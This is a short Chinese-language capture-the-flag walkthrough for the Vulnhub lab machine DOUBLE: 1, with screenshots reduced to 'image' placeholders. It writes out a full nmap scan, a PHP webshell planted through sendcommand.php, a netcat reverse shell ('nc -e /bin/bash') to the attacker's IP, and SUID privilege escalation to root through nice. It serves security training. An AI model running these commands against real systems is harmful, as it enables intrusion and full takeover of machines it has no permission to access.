Vulnhub: DOUBLE: 1靶机

发布时间 2023-08-22 16:36:34作者: ctostm

kali:192.168.111.111

靶机:192.168.111.209

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.209

image

目标80端口

image

image

sendcommand.php页面源码

image

写入webshell

<?php system($_GET["cmd"]);?>

image

执行命令

http://192.168.111.209/production/sendcommand.php?out=out&cmd=id

image

获得反弹shell

http://192.168.111.209/production/sendcommand.php?out=out&cmd=nc -e /bin/bash 192.168.111.111 4444

image

提权

查找suid权限的文件

find / -perm -u=s -exec ls -al {} \; 2> /dev/null

image

提权方法:https://gtfobins.github.io/gtfobins/nice/#suid

image

提升为root

/usr/bin/nice /bin/bash -p

image